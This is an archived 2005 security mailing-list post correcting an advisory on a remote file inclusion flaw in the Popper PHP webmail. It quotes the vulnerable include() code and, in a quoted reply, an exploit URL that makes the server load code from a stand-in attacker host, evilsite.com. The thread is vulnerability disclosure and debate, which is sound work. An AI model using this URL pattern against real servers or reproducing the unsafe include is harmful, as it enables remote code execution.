lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20050605232357.CC5BC42F3D@maja.zesoi.fer.hr>
Date: Mon Jun  6 00:24:11 2005
From: ljuranic at lss.hr (Leon Juranic)
Subject: Re: LSS.hr false positives. (correction)


Hi b0iler,


There is a problem with original advisory on security.lss.hr site.  Vulnerable 
PHP line itself is presented as HTML tag so it isn't visible within browser. 
That's why the rest of the advisory doesn't make any sense.

Here it is:
--------------
..
<?php
		if(file_exists($form.".toolbar.inc.php")) {
			include($form.".toolbar.inc.php");
		}
?>
..
..
<?php include($form.".form.inc.php");?>    <- HERE IT IS
..
--------------


I apologize for that mistake, we will fix that in a few hours. 



> b0iler[at]r00thell.org:
>
>>Popper is vulnerable to remote code inclusion bug in childwindow.inc.php script that can be
>>abused to execute arbitrary code.
>>Vulnerable code in childwindow.inc.php:
>>
>>-----
>>...
>>    if(file_exists($form.".toolbar.inc.php")) {
>>        include($form.".toolbar.inc.php");
>>    }
>>?>
>
>file_exists() only work on local files, not even with allow_url_fopen on does it work.  Even
>if the file_exists() check was not there your discription of how to exploit it is incorrect:
>
>>To exploit this vulnerability, attacker has to put script like test.form.inc.php on
>>www.evilsite.com HTTP server, and call url like this:
>>http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test
>
>they would need to have the file test.toolbar.inc.php, not test.form.inc.php.  It's quite
>obvious you did not even bother testing this before issuing the advisory.
>


Regards,
---------------------------------------
Leon Juranic, LSS Security 
http://security.lss.hr 

"Born under the lucky star magical, 
but on this world generally tragical". 
                                - Djole

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ